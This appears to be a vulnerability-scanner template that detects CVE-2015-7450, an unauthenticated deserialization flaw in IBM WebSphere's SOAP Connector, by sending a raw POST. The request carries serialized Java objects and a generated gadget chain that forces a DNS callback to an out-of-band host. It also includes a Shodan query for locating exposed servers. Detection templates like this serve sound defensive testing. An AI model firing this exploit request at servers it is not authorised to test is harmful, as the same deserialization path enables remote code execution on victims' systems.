id: CVE-2015-7450
info:
name: IBM WebSphere Java Object Deserialization - Remote Code Execution
author: wdahlenb
severity: critical
description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).
remediation: |
Apply the latest security patches provided by IBM to mitigate this vulnerability.
reference:
- https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
- https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2015-7450
- http://www-01.ibm.com/support/docview.wss?uid=swg21972799
- http://www-01.ibm.com/support/docview.wss?uid=swg21970575
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2015-7450
cwe-id: CWE-94
epss-score: 0.9739
epss-percentile: 0.99886
cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: ibm
product: tivoli_common_reporting
shodan-query: http.html:"IBM WebSphere Portal"
tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=utf-8
SOAPAction: "urn:AdminService"
rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==
getUnsavedChanges
{{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}
rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=
matchers-condition: and
matchers:
- type: word
words:
- 'SOAP-ENV:Server'
- ''
condition: and
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 500